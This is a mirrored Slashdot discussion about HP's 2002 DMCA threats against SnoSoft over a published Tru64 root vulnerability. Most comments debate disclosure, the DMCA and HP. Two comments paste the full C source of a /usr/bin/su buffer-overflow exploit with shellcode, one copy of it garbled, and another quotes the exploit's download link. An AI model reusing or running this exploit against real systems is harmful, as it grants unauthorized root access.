Slashdot Mirror
HP Uses DMCA To Quash Vulnerability Publication
Several readers wrote to note the fact that HP has evidently threatened to use the DMCA and computer crime laws against SnoSoft who have found a security flaw in Tru64. The quote from the HP VP is that the accused "could be fined up to $500,000 and imprisoned for up to five years."
So this is the real reason HP didn't want Bruce Perens to demonstrate against the DMCA?
Very mature compared to what big business does. "Wahh wahhh wahh!!! Help us Uncle Sam, we're poor defenseless transnational corporations!" Buncha whiners.
People shape laws. Not the other way around.
When Alan Cox originally discussed the notion that companies would (mis)use the DMCA in the security field, he was widely attacked for being silly.
Anyone still feel like laughing?
Halfway around the world, Bill Gates breathes a long sigh of relief as Microsoft's profitability is assured well into the next century...
-Chris
--an unbreakable toy is useful for breaking other toys--
Finisterre said that while he wanted to resolve the dispute with HP, he resented receiving DMCA threats. "We are like the guys that found out that Firestone tires have issues on Ford explorers," he said. "It's not our fault your Explorer has crap tires. We just pointed it out. We should not get attacked for pointing out issues in someone's product nor for proving it is possible."
When will people learn this is the same thing?
It was legitimate for you to cooperate with HP's valid concern that, as a "deep pockets" organization it would be too risky for them to let you challenge the DMCA. I understood that.
But now it appears that you work for a company that is using the DMCA as a club to suppress discussion of security flaws. It doesn't seem that the two hats you wear (your HP role and your open source leadership role) are compatible unless you can persuade HP to back off.
It is possible, of course, that the DMCA threat is coming from one manager who is shooting his mouth off. If so, we need a clarification from higher management: is it the policy of HP to use the DMCA to suppress discussion of their security flaws, or not?
* Technically, they only threatened to invoke the DMCA. As of now, HP has also only threatened to invoke it.
-- Don't Tase me, bro!
"On July 19, a researcher at SnoSoft posted a note to SecurityFocus.com's popular Bugtraq mailing list with a hyperlink to a computer program letting a Tru64 user gain full administrator privileges. The researcher, who goes by the alias "Phased," said in the message: "Here is the warez, nothing special, but it does the job." "
Call me crazy, but if I were a mega-corporation, I wouldn't want someone releasing "warez" to break into my systems this way. If this was announced in a different way, like say a formal research group contacting the company privately with test results, instead of just some random person posting under an alias to an open list like BugTraq, things might be different.
Come to the University of Mars! Classes starting soon!
this is really a shame. hp was one of the technology companies that had a lot going for it.
when you are fighting in a tough market *and* trying to make a merger happen without too much bad stuff, it seems that it is counter-productive to play this game: you make people mad, you spend resources (money and man-hours that could be easily used elsewhere) and you are *not* going to achive the immediate goal of supressing bad stuff (real or imagined).
so hp gets more points in the bad pr column, they waste money, and the problem doesn't go away. i hope that they spin off the printer division before they crash and burn.
eric
p.s. i guess the worst part is that hp *didn't* learn from all the other companies that went down this path.
got fed up of corporate bullshit
here is the warez, nothing special, but it does the job
note, this is just one of many many exploitable bofs in tru64 5.x
http://deepmagic.securify.org.uk:8080/su.c
phased
phased@mail
The part that says "Thou shalt not give multi-billion dollar companies, who buy laws, a hard time."
python -c "x='python -c %sx=%s; print x%%(chr(34),repr(x),chr(34))%s'; print x%(chr(34),repr(x),chr(34))"
in other news today the FBI raids the offices of SnoSoft in search of DMCA prohibited cracking tools, they immediately sieze compilers, source code, and felt markers.
- Securith through Obscurity
and- Security through Diligence
we now add the mighty- Security through Litigation?
To be fair, when do the handgun designers go to jail again?Kevin Fox
Ok someone fill me in here:
How on earth does a law pertaining to the circumvention of copyright protection systems apply at all to someone releasing a security flaw in an operating system?
The public has the right to know about these security flaws, just as much as we have the right to know if the tires we buy pass safety standards.
HP trying to cover this up just proves its a problem. HP is using the DMCA to prevent people from discussing valid flaws in their OS'.
People have the right to know if the car they're driving -- or are going to buy -- is unsafe. Why? Because their lives depend on it, literally. For the same reason, people have the right to know if the OS they're using is secure. Why? Because their lives depend on it, or at least their carreers. Data important to one's carreer (i.e., scientific experimental data) is stored on one's computer. Private information -- i.e., credit card information -- is stored on a computer. Security holes can literally destroy one's life.
We have the right to know exactly what problems their are in our software.
social sciences can never use experience to verify their statemen
This is just another reason to say "fuck you, the new HP" and run faster to Linux and *BSD. Admittedly, anyone who has recently had to compare the price of an ES40 and an equivalent amount of Intel-compatible compute is probably already heading there...
Still, this sort of head-in-the-sand response to security vulnerabilities is not a good way to make happy customers. Obviously, the exploit exists; what HP apparently wants to do is make sure that it only gets passed around on IRC so that admins can get completely blindsided.
Of course, Compaq already killed the Alpha, and don't get me started on their support contracts (OK, so they inherited those). It's almost as if they don't want customers (well, DigitalUNIX/Tru64 customers probably *are* a bit of a pain in the ass, compared to MCSEs).
It's just sad to see the last bits of the carcass of what was once a pretty cool company (DEC) get so abused.
Email their president and CEO from this page!
Tell her in NICE non flaming tones why you feel what they are doing is wrong. Explain that this kind of action makes you unwilling to buy any more products from them.
--Won't that be grand? Computers and the programs will start thinking and the people will stop. - Dr. Walter Gibbs
HP Classic would never have pulled a stunt like this. They would have gone, "Oops, my bad, here's a bugfix everyone."
As time goes on, it looks more and more as if Walter Hewlett and David Packard were right: This whole "New HP" thing is just so much hogwash.
Schwab
Editor, A1-AAA AmeriCaptions
For those of you who are HPaq-ese impaired, here is the message:
Dear HPaq customers,
We thank you for having purchased our products in the past, but now that we have finalized our merger and cashed our options, we have lost our minds and come to the boggling conclusion that we don't want your money anymore. Please do not buy our products because honestly you can't trust us to inform you when there is a defect with our product. This includes any servers, and handhelds our merger partner might peddle, printers, or whatever the hell it is these people do. As a sign of our gratitude for your service, we will be providing each future customer with a free Berber mousepad under which you can sweep any problems you discover. I you believe the problem doesn't exist, and we believe the problem doesn't exist, then we can work together to warp reality and drive cusomers away like poor starving slobs on the street corner to a free luncheon. Personally, I don't recommend you use these things in anything that might risk a human life or attempt to improve society in any way. Heck, I wouldn't run my porn servers on this crap. Well, gotta run, muy coke dealer is here. And don't forget to F off!
P.S. - Don't unravel the mousepad to see how it's made or we'll sue your ass into orbit under the DCMA.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
HP should be thanking them
This is a bad thing for HP. The thing is, hackers love to share their code with the world. And there are two ways to exploit that obsessive desire, either through good (white hat) mechanisms or through bad (cracker) mechanisms. If HP prevents hackers from researching exploits in a legitimate fashion, it won't stop the hackers -- they'll just only leak their hacks onto Eastern European warez websites outside of the reach of US law. HP won't be aware of anything until it's too late and millions of dollars of damage have already been done by malicious parties. It's like that old saw about gun ownership: When hacking software is a crime then only criminals will hack your software.
There are two kinds of people: 1) those who start arrays with one and 1) those who start them with zero.
Yep. Murderers don't kill people; guns do! Don't send the murderers to jail; go after the gun manufacturers.
The USC made a stupid law; just because a stupid law exists it does not mean that it should be used to quash legitimate research. If Carly had half a brain, she would fire the idiot VP and apologize to Snosoft. But don't count on it happening anytime soon.
#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
char shellcode[]= "\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47" "\x11\x14\xe3\x43" "\x20\x35\x20\x42" "xff\xff\xff\xff" "x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j; char buffer[8239]; char payload[15200];
char nop[] = "\x1f\x04\xff\x47"; bzero(&buffer, 8239); bzero(&payload, 15200); for (i=0;i8233;i++) buffer[i] = 0x41;
buffer[i++] = 0x01; buffer[i++] = 0x04;
buffer[i++] = 0x01; buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i15000;) { for(j=0;j4;j++) { payload[i++] = nop[j]; } }
for (i=i,j=0;jsizeof(shellcode);i++,j++)payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
Perhaps HP - having stopped Bruce Perens from protesting against the DMCA via civil disobedience - is attacking it via a reductio ad absurdum method. i.e. Showing exactly how it violates the principles of Free Speech. It's officially illegal to state that the Emperor has no clothes.
Zoe Brain - Rocket Scientist
I am quite disappointed with HP's recent conduct with two issues related to the DMCA. I am in a senior enough position as a UNIX administrator that I have significant impact in how a multi-million dollar IT budget is spent. HP's invocation of the DMCA reduces my trust in HP as a vendor of secure and reliable technology. Therefore I am less inclined now than I ever have been in the past to purchase HP products.
The first issue is HP's request that Bruce Parens not present his findings on DVD copyright controls. If he is acting on his own behalf, and includes a disclaimer that this is a separate issue from what he does under the employment of HP, he should be allowed to go forth. If he is presenting HP intellectual property, HP has the right and responsibility to protect itself. This, however, does not seem to be the case.
The more disturbing issue is with regards to the handling of SnoSoft's publication of root exploits to the Tru64 operating system. As a UNIX administrator, I am responsible for researching technologies that I will put into production. Many times, these products are used to protect the intellectual property, stability, or other things that are of great importance to my employer's success and my career. If security researchers cannot force many of the bugs out in the open before I evaluate products, I have much more work on my hands. Furthermore, if I find a bug that I know can be used to compromise my system, without the ability to publicly discuss and disclose the bug, I may be unable to get a fix from the vendor or a home-grown workaround. If I am at the complete mercy of my vendors' good will, I fear that I will have a system that lacks stability and security.
Please reconsider your decision to use the Digital Millenium Copyright Act to stifle free speech. Once you come to the realization that the DMCA is not a law that is useful for HP, please put your lobbying efforts into repealing it and push for funding to enforce pre-DMCA laws that already provide more than adequate protections on copyright and other intellectual property issues.
I do not speak for my employer. Please remember, however, that my employer trusts me to make decisions that are in the employer's best interest. Your actions suggest that the purchase of HP products is in the best interest of no employer that I would work for.
Let the crackers have it.
...richie - It is a good day to code.
So free speech is good for academics, but not for random hacker?
What difference does it make who finds and reports a bug? The cool thing about the Internet is that you don't have to be a professor at MIT to publish security exploits. The publications speaks for itself.
And if I'm running affected software, I don't care who reports the problem - as long as I find out and get a fix.
Would you still feel the same if your bank kept your accounts on an Tru64 HP machines?
...richie - It is a good day to code.
Mrs Fiorina,
I work for a retailer -- Best Buy -- which sells a large volume of HP and Compaq products. I have long been a fan of Hewlett Packard, but some recent news is troubling me.
Kent Ferson's reaction to Phased's posting of the security vulnerability in Tru64 was nothing short of shockingly irresponsible.
Not only am I disturbed that there was no statement of any intent to fix the security hole, but I am shocked at the threat of a lawsuit under the DMCA. You should be grateful that the hole was brought to your attention before it became a widespread problem, not to mention that had you fixed it in a timely manner (as the hole was revealed to you by SnoSoft last year), this would never have been a problem.
This reaction tells me that not only is HP/Compaq concerned more with their image than with ensuring the quality of their products, but that "The New HP" would rather abuse copyright law by "shooting the messenger" than issue a responsible statement, and repair an error before it becomes a problem.
I'll be waiting in the next few days for a press release or some other statement denouncing Mr. Ferson's actions, and showing that HP has plans to repair the hole in Tru64. Until this happens, I'm not sure I'll be able to reccomend that anyone give their money to Hewlett Packard.
Looking forward to your response.
[Name Removed]
--
"I personal[ly] think Unix is "superior" because on LSD it tastes like Blue." -- jbarnett
Bruce, if I were president of HP, I would immediately fire Kent Ferson, the vice president who wrote the letter. The letter says, basically, that HP is not able to fix the problem, and would rather hide its security problems.
This is a marketing disaster for HP. Probably Mr. Ferson has little technical knowledge and does not realize that his letter speaks loudly and clearly to the whole world of technically knowledgeable people, and does irrepairable damage to HP.
We live in an amazing world where free products are better than expensive ones. The open source response to a security problem is to have a bug fix on all the mirrors in 48 hours. The response of billion dollar companies with tens of thousands of well-paid employees is to try to weasel out of doing the right thing. Who would have guessed it would be that way?
It seems that you could do HP a big favor if you could educate top management. But maybe they are not educable.
Just in case few of us here don't know about him. You can find his homepage here
, and in his Bio you can find:
" Hewlett-Packard Corporation - 2000 to Present
Senior strategist, Linux and Open Source. I am the first Open Source evangelist to gain a role in top management of a multi-Billion-dollar corporation. On the org chart there are only three people between me and the CEO - a general manager, a vice president, and a president. Among my assignments is to challenge HP management."
So he's in position to speak up in this case.
Note: I don't know if it's redundent but I'm sure some people would like to know. I don't ask for any mod point.
I dont see the point of taking HP to task for it. .. whoopdee doo.
.. what we need is a change in the law.
.. too often a flaw gets found and the company sweeps it under the rug maybe they'll fix it in the next version but prior versions are vulnerable.
.. why cant I do it with the applications I use and store my depply personal information (from baby pictures to tax and health records) on?
It's a waste of time. Even if they back off
Please
Hackers can expose findings and report them to companies
Given the sad fact that all our politicians (not just in america but worldwide are elected by money) maybe the following compromise can be reached:
a) Hackers who find vulnerabilites must email a notice and description to the company. He must try to give at least 24 hours notice before announcing it to the public unless he knows of an imminent exploit in the wild (like an impending mass DDOS attack or something). In that case he should be allowed to announce it to the public immediately.
b) Companies that take no action (that is dont make a patch available/requestable) on a vulnerability that was reported to them but not announced to the public, are liable for exploits.
c) The setup of a third party security company or government department where hackers can email reports of finding vulnerabilities. This is like CERT or bugtraq but the organization must have the funding and capability to pursue inaction on the part of companies that do not fix reported and well documented security flaws.
Is there any way for you to use your publicity to bring something like this about?
At least try. I hate the fact that curiousity is now a crime. I am allowed to take apart my car and see how it works
Thanks,
Johan
I can see it here, US Government is progressively inventing laws that ensures:
....Imagine, no violence, no crime, no hunger...a perfect world!
Only the Government can investigate crimes.
Only the Government can test, examine, uncover defectives in consummer products
Only the Government can perform reverse engineering on anything
Only the Government is allowed to use top-grade encryption
The scope of Free Speech is defined by senators, and it happens that no constitutional right are being intruded.
That's to say, US would become a country where citizens, by laws, SHOULD trust the Government and any questions on the already established laws and regulations are prohibited.
What's wrong with the picture? I don't know, but I've read a novel book about a country whose government has absolute power over their citizens and no citizen is allowed to question the decision of the government. This government does not use any military power or violence to control their citizens, but by laws.
IIRC at the end of this story all the citizens end up living in an array of big tubes of liquid, and the rest of the rebels are either jailed(brains were sperated from their body) or terminated(becomes food for others). It's like Matrix, but this time some humans control everything.
Don't say it...don't say it...I'm warning you...
Use Linux.
Damn, I said it.
Why the fuck don't people want exploits fully disclosed? Sure, I don't have a problem with waiting a week or so to give a team/vendor (yes, even Microsoft) a chance to roll out a patch before making it public. It's a courtesy, not a necessity.
<rant />
Clearly some sort of political action is required. I suggest:
1. The DMCA needs to be repealed or ruled unconstitutional. Hopefully the ACLU or the EFF will take a case that'll get us there. Or some rich philanthropist geek could 'violate' it by exercising their constitutional rights. But the best ploy is for every one of *us* to contact (visit,snailmail,fax,call,email) 'our' reps in the House and Senate, rationally outline our objections, and protest like hell if they don't. Civil disobedience, etc.
2. Abolish corporate personhood (same methods).
3. Abolish the lobby industry.
4. Abolish campaign finance. Make it publicly funded, free TV-radio spots (public airwaves) equally distributed among ballot-qualified candidates.
We've let corporations have far too much swing. I'm all for making a buck, but Jesus F***ing Christ...
Today I read an article on news.com (http://news.com.com/2100-1023-947325.html) that Hewlett-Packard has intended to use the Digital Millennium Copyright Act (DMCA) to punish a company that has released information about a security vulnerability in an HP product. For quite some time I have been telling you that the DMCA is a bad law that needs to be repealed, and this is just more evidence to that effect. HP has known about this vulnerability for a year, but has chosen to do nothing to fix it.
HP's action could set a precedent that would stifle technology research. Companies would be free to release broken technologies that would eventually be used in high-security environments. Anyone who attempted to test the strengths of these products would be branded a criminal.
HP's customers and the American public deserve to know about security issues in HP's products. Withholding such information is just like the accounting scandals that have been rampant in recent times. Insecure technology is a weapon that hackers and terrorists can use against us. So when an American company decides to hide behind an American law rather than fix it products, our politicians need to re-examine that law.
I urge you to sponsor legislation that will repeal the DMCA. Americans deserve better. Please write back to me and let me know that you support my fair use rights in a digital world, and that you'll be working to repeal the DMCA.
And the men who hold high places must be the ones who start
To mold a new reality... closer to the heart
In my investigation, I read the Snosoft home page. This is the second sentence of their introductory paragraph:
Now, I don't know any of the people involved or how they really do business, and thus I am not ready to make any allegations. But that sentence sounds a bit like a shakedown, doesn't it?
I would hate to be manipulated in a shakedown of my own company.
On the other hand, some people say this is a year-old bug and that there was long correspondence before one of the employees finally revealed it. I don't know if that's true yet.
What do you think?
Bruce
Bruce Perens.
#include <stdio.h>
/* 0x140010401 */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
char shellcode[]=
"\x30\x15\xd9\x43" "\x11\x74\xf0\x47" "\x12\x14\x02\x42" "\xfc\xff\x32\xb2" "\x12\x94\x09\x42" "\xfc\xff\x32\xb2" "\xff\x47\x3f\x26" "\x1f\x04\x31\x22" "\xfc\xff\x30\xb2" "\xf7\xff\x1f\xd2" "\x10\x04\xff\x47"
"\x11\x14\xe3\x43" "\x20\x35\x20\x42" "\xff\xff\xff\xff" "\x30\x15\xd9\x43" "\x31\x15\xd8\x43" "\x12\x04\xff\x47" "\x40\xff\x1e\xb6" "\x48\xff\xfe\xb7" "\x98\xff\x7f\x26" "\xd0\x8c\x73\x22" "\x13\x05\xf3\x47" "\x3c\xff\x7e\xb2" "\x69\x6e\x7f\x26" "\x2f\x62\x73\x22" "\x38\xff\x7e\xb2" "\x13\x94\xe7\x43" "\x20\x35\x60\x42" "\xff\xff\xff\xff";
main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";
bzero(&buffer, 8239);
bzero(&payload, 15200);
for (i=0;i<8233;i++)
buffer[i] = 0x41;
buffer[i++] = 0x01;
buffer[i++] = 0x04;
buffer[i++] = 0x01;
buffer[i++] = 0x40;
buffer[i++] = 0x01;
for (i=0;i<15000;) {
for(j=0;j<4;j++) {
payload[i++] = nop[j];
}
}
for (i=i,j=0;j<sizeof(shellcode);i++,j++)
payload[i] = shellcode[j];
printf("/bin/su by phased\n");
printf("payload %db\n", strlen(payload));
printf("buffer %db\n", strlen(buffer));
execl("/usr/bin/su", "su", buffer, payload, 0);
}
The theory of relativity doesn't work right in Arkansas.
As long as what you say doesn't jeopardize national security, suggest an interest in terrorism, reveal trade secrets, infringe on copyrights, trademarks, or patents, isn't a description of sexual activities involving anyone under the age of majority, isn't disruptive, doesn't explain how to circumvent copyright, doesn't explain how to acquire or use drugs, isn't seditious, doesn't reveal trade secrets, doesn't threaten our vital national unity during this ongoing and arduous war against terrorism, and is otherwise relatively inoffensive, you can say almost anything you like in the US.
I think HP is wrong with its DMCA style threats, because they are not appropriate. However, I can sympathise with HP and understand why they may have "lashed out". I think the hacker in question was wrong to irresponsibly post the exploit for script kiddies to start playing with fire. For all the debate about various sorts of disclosure processes, it's quite clear that this approach potentially has a high impact upon any deployed systems and gives no time for either the vendors or the administrators to take action. This is just not a responsible real-world approach to dealing with security issues.
-- Matthew - matthew.gream@pobox.com, http://matthewgream.net
The EFF I respect. I understand their issues, and the fact that we are totally under assault by corporations who want to chop up the digital world and sell it to us at as much as we can possibly afford to pay. Digital "Coal Towns" (look it up if you want to see some of America's greatest corporate crimes against humanity in the past).
/. crowd, I'd like to say lets stick to what we are specifically interested with on this board... and not give money to people who would love to "engineer through legislation" a power struggle at the expense of some Americans over other Americans.
As a member of the media, and a person that touches base with the ACLU every few weeks, I'll say that the ACLU is no longer interested in civil liberties, but more interested in legislating this society to a direction that they would prefer us to act. Trying to modify behavior through legislation is very different than protecting the right for us to act the way WE WANT TO ACT.
As of late, they seem to be only interested in anyone else but a person interested in computers. After talking with me several times face to face, the local rep of the ACLU has pretty much explained about their crusade against private Christian schools (please not the stressing of private) and their deemed "objectionable behavior" by those schools, and active interest in what goes on inside those schools. Those activities are rather curious for an organization like the ACLU, are they not?
After talkig to them about these subjects, I would never, EVER give them another dollar. They appear to represent the civil liberties of only SOME AMERICANS. OF COURSE, before I get slapped back, I would like to repeat this... imho, IMHO, IMHO!
So as a member in good standing of the
This is a call to not listen to the ACLU. For computer issues, please stick your money to the EFF. The ACLU has gotten batty in its old age, and is trying to change the way we think, which the last time I checked, is a CIVIL LIBERTY.